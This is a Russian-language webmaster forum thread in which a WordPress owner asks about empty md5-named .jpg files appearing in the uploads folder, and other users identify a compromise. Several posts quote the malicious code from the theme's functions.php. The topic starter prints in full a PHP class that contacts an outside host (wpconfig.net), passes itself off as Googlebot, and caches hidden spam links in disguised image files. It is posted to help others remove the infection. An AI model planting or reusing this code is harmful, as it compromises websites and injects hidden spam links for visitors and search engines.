X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> WordPress File Monitor: кое-что не могу понять
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:26; Ответить: DarkZo5m
Сообщение #1


Всем привет! У меня на WP сайте стоит плагин WordPress File Monitor. Он присылает ежедневно отчёт о том, какие файлы удалились, добавились или изменились. Так, в каждом отчёте есть строки о том, что были изменены файлы:

wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg
wp-content/uploads/2013/9cb98b1d4a45bcd7377dca2b8cdb9745.jpg

Если пройти по ссылке вида сайт.ру/wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg, то выдаётся сообщение, что изображение не может быть показано, так как содержит ошибки.

В директории uploads лежит на данный момент 12 файлов с подобными именами, размер каждого - 0 байт, они пустые.

Файлы создались самостоятельно и в разные дни.

Может быть, кто-нибудь знает, что это за гадя и как её вылечить?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 1:40; Ответить: RSmile
Сообщение #2


Шелл залит) Нотепадом этот файл откройте и посмотрите его) А может с темой залит, смотреть надо. Удаляйте и ищите вредоносный код. Обычно в функшн.рхр

Сообщение отредактировал RSmile - 4.7.2013, 1:41


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:55; Ответить: DarkZo5m
Сообщение #3


(RSmile @ 4.7.2013, 2:40) *
Нотепадом этот файл откройте и посмотрите его)

Так открыл уже все файлы, написал же, они пустые.

И с темой тоже не лились.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 2:14; Ответить: RSmile
Сообщение #4


Причём тут пустые? Потом через шелл они наполнятся
Вот пример кода который встречается в файлах

<!-- wp-templates.ru/rules правила ссылки >> --> <div id="posts"> Простые, интересные и умные <a href="http://timedead.ru/">флешки</a> </div><noindex><style>#posts{position:absolute;left:-1960px;}</style></noindex>


Сообщение отредактировал RSmile - 4.7.2013, 2:21


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 2:25; Ответить: DarkZo5m
Сообщение #5


(RSmile @ 4.7.2013, 3:14) *
Скачайте Notepad++ и им откройте этот "пустой" файл.

Скачал Notepad++, открыл им этот пустой файл и, не поверите, он оказался пустым. В чём тогда может быть дело?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 14:01; Ответить: RSmile
Сообщение #6


Ну ок, тогда ждите пометки от Яндекса. Я же русским языком написал, что это пока они пустые, потом заполнятся кодом. Ищите вредоносный код. Он может быть где угодно. Для начала начните с файлов темы. Это не так трудно.


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HeavyHell
HeavyHell
сообщение 4.7.2013, 14:42; Ответить: HeavyHell
Сообщение #7


DarkZo5m, рассказать почему RSmile столь уверенно вам пытается объяснить?
Менее недели назад мы один его сайт от этой бяки чистили... Даже не знаю, есть ли смысл создавать тему коль не слушаете советов тех, кто с этим сталкивался biggrin.gif


--------------------


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoFirma
SeoFirma
сообщение 4.7.2013, 22:25; Ответить: SeoFirma
Сообщение #8


DarkZo5m, у Вас какая-то гадость в файлах темы, плагинов или движка. Это дырка, через которую пытаются что-то залить.

RSmile Вам написал пример кода, в данном случае, это скорее всего тоже взлом был. Ему таким образом вставляли невидимые для посетителей сайта ссылки.

Первым делом, советую пересмотреть файлы темы, если разбираетесь в коде. А вообще, лучше переустановить движок с нуля, может еще где зараза есть. Ну и код темы смотреть обязательно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 6.7.2013, 1:22; Ответить: kagtus
Сообщение #9


ищите в файлах шаблона вставку с таким началом
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

var $host = 'wpconfig.net';
var $path = '/system.php';
var $_cache_lifetime = 21600;
var $_socket_timeout = 5;


сегодня удалял такое, вставка была в wp-content/themes/тема/functions.php
спамила в wp-content/uploads/2013

Сообщение отредактировал kagtus - 6.7.2013, 1:25


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 7.7.2013, 14:51; Ответить: DarkZo5m
Сообщение #10


Хм, и правда, была гадя на сайте. В общем, у кого такая же проблема, открываем functions.php темы и удаляем оттуда следующий код:

<?php error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Что думаете про крптовалюту Bittorrent?
82 Webranger 12481 10.5.2021, 21:53
автор: VinogradOFF
Открытая тема (нет новых ответов) Clubhouse в России: что происходит с голосовой соцсетью сегодня
8 VinogradOFF 2406 8.5.2021, 1:18
автор: Filadelso
Открытая тема (нет новых ответов) Специалисты по WordPress и OC
Для взаимовыгодного сотрудничества
3 Heimdall 1907 2.5.2021, 18:05
автор: WGN
Опрос (нет новых голосов) Опрос: Что сулит Core Update?
рассуждаем на тему
8 Filadelso 2255 2.5.2021, 16:18
автор: Rybakin
Открытая тема (нет новых ответов) Высокий процент отказов, что лично Вас в нем отталкивает?
23 alexandrrr 4339 1.5.2021, 17:14
автор: ViktoriaFE


 



RSS Текстовая версия Сейчас: 12.5.2021, 22:28
Дизайн